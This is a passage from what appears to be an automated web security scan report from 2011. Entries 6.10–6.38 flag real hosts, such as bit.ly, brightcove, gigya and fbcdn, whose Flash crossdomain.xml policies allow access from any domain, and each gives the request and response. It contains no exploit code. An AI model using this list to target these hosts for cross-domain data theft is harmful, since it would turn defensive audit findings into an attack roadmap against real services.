Last-Modified: Fri, 17 Jun 2011 17:02:20 GMT
ETag: "b8e352-cc-4a5eb593e5f00"
Accept-Ranges: bytes
Content-Length: 204
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.10. http://api.bit.ly/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.bit.ly

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:45:49 GMT
Content-Type: text/xml
Content-Length: 141
Last-Modified: Wed, 25 May 2011 20:29:51 GMT
Connection: close
Expires: Tue, 06 Sep 2011 00:45:49 GMT
Cache-Control: max-age=172800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!-- http://bit.ly/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.11. http://as.casalemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: as.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:27:27 GMT
ETag: "15690dc-e6-1230c1c0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Sun, 04 Sep 2011 01:02:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:02:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.12. http://audit.303br.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://audit.303br.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: audit.303br.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"202-1313613444000"
Last-Modified: Wed, 17 Aug 2011 20:37:24 GMT
Content-Type: application/xml
Content-Length: 202
Date: Sun, 04 Sep 2011 00:45:12 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

6.13. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 05 Sep 2011 00:42:17 GMT
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.14. http://bh.contextweb.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
Accept-Ranges: bytes
ETag: W/"269-1314729062000"
Last-Modified: Tue, 30 Aug 2011 18:31:02 GMT
Content-Type: application/xml
Content-Length: 269
Date: Sun, 04 Sep 2011 01:21:59 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
               <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.15. http://c.brightcove.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.brightcove.com

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Tue, 02 Aug 2011 23:56:42 UTC
Cache-Control: must-revalidate,max-age=0
Content-Type: application/xml
Content-Length: 387
Date: Sun, 04 Sep 2011 01:06:09 GMT
Connection: keep-alive
Server:

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

6.16. http://c5.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c5.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c5.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:04:15 GMT
ETag: "77adf2-f7-44d91a5da81c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 247
Date: Sun, 04 Sep 2011 01:22:05 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.17. http://c7.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 247
Content-Type: application/xml
ETag: "77adf2-f7-44d91a5da81c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6536
Date: Sun, 04 Sep 2011 01:04:27 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.18. http://cdn.cinesport.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.cinesport.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.cinesport.com

Response

HTTP/1.0 200 OK
x-amz-id-2: aEaeSUpc60vkN5xGlJj7zIBJehC+5D6nUIMHOJ5M6rcQc8P9nk0vOx9i3FSBXAui
x-amz-request-id: 521035425F0CA074
Date: Tue, 22 Mar 2011 22:58:30 GMT
x-amz-meta-s3fox-filesize: 204
x-amz-meta-s3fox-modifiedtime: 1254865363318
Last-Modified: Tue, 06 Oct 2009 21:49:18 GMT
ETag: "199ac761aefc6dd785276dfea364b271"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 204
Server: AmazonS3
Age: 4964
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 458df1119b180bde4aa261499705692ef0861449c6ed965fd28ed274ac9a0faf42b25cf1c8b5350f
Via: 1.0 2ba8d32c0ef1d73da2fcae191d906606.cloudfront.net:11180 (CloudFront), 1.0 4fbd9b3a8165adb6c7a206b9088f20b1.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

6.19. http://cdn.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 15:00:41 GMT
ETag: "80b2ea66b4efcb1:0"
Server: Microsoft-IIS/7.5
X-Server: web103
Cache-Control: max-age=86400
Date: Sun, 04 Sep 2011 00:42:57 GMT
Content-Length: 355
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.20. http://cdn.taboolasyndication.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.taboolasyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.taboolasyndication.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:58 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 03 Feb 2011 17:27:56 GMT
ETag: "a88001-199-49b64160f9f00"
Accept-Ranges: bytes
Content-Length: 409
Content-Type: text/xml
Cache-Control: private, max-age=31536000
Age: 17664036
Expires: Sat, 11 Feb 2012 14:05:22 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*"/>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443"/>
...[SNIP]...

6.21. http://cdn.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Sun, 04 Sep 2011 01:06:31 GMT
Date: Sun, 04 Sep 2011 01:06:31 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.22. http://cdn.visiblemeasures.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.visiblemeasures.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: cdn.visiblemeasures.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=500&flashID=myExperience&bgcolor=%23F4F4F4&wmode=opaque&dynamicStreaming=true&videoSmoothing=true&playerID=1055201224001&publisherID=315980433&isVid=true&autoStart=false&isUI=true&allowScriptAccess=always&debuggerID=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "49e4e5b932ff87fda571934152e3458c:1267584532"
Last-Modified: Wed, 03 Mar 2010 02:48:52 GMT
Accept-Ranges: bytes
Content-Length: 141
Content-Type: application/xml
Date: Sun, 04 Sep 2011 01:10:41 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

6.23. https://cdns.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://cdns.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdns.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 15:00:41 GMT
ETag: "80b2ea66b4efcb1:0"
Server: Microsoft-IIS/7.5
X-Server: web102
Cache-Control: max-age=86400
Date: Sun, 04 Sep 2011 01:22:14 GMT
Content-Length: 355
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.24. http://clk.fetchback.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: clk.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

6.25. http://companion.adap.tv/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://companion.adap.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: companion.adap.tv

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: text/xml
Connection: close
Content-Length: 194

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

6.26. http://control.adap.tv/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://control.adap.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: text/xml
Connection: Keep-Alive
Content-Length: 194

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

6.27. http://d3fd89.r.axf8.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d3fd89.r.axf8.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d3fd89.r.axf8.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 20 Jul 2010 09:32:23 GMT
Accept-Ranges: bytes
ETag: "56b3a475ee27cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:58:59 GMT
Connection: close
Content-Length: 153

<?xml version="1.0"?>
<!-- http://www.adobe.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.28. http://external.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Sun, 04 Sep 2011 01:13:06 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.29. http://findnsave.sacbee.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://findnsave.sacbee.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: findnsave.sacbee.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 15 Dec 2009 23:03:45 GMT
Accept-Ranges: bytes
ETag: "ed84bfdada7dca1:0"
Server: Microsoft-IIS/7.5
X-Rewritten-By: ManagedFusion (rewriter; reverse-proxy; +http://managedfusion.com/)
X-ManagedFusion-Rewriter-Version: 3.0
X-Rewritten-By: ManagedFusion (rewriter; reverse-proxy; +http://managedfusion.com/)
X-ManagedFusion-Rewriter-Version: 3.0
X-Powered-By: ASP.NET
X-Server-Name: FS1
Date: Sun, 04 Sep 2011 01:22:28 GMT
Connection: close
Content-Length: 221

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<
...[SNIP]...

6.30. http://gannett.gcion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gannett.gcion.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

6.31. http://goku.brightcove.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://goku.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: goku.brightcove.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:12:45 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 14:35:23 GMT
Content-Length: 116
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
</cross-domain-policy>

6.32. http://gscounters.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gscounters.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Length: 341
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:2dc1"
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web201
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:44:37 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.33. http://i.w55c.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: i.w55c.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:47 GMT
Server: Jetty(6.1.22)
Cache-Control: max-age=86400
Content-Length: 488
content-type: application/xml
Via: 1.1 bfi061002 (MII-APC/2.1)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

   <allow-access-from domain="*" to-ports="*"/>
   <site-control
...[SNIP]...

6.34. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:22:43 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 01:22:43 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.35. http://imp.fetchback.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:18 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

6.36. http://init.lingospot.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://init.lingospot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: init.lingospot.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: max-age=7200
Content-Type: text/xml
Etag: "-5d35a762ba6b2244"
Last-Modified: Sun, 04 Sep 2011 00:58:31 GMT
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:58:31 GMT
Server: Google Frontend

<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

6.37. http://js.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sun, 04 Sep 2011 00:42:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.38. http://load.exelator.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
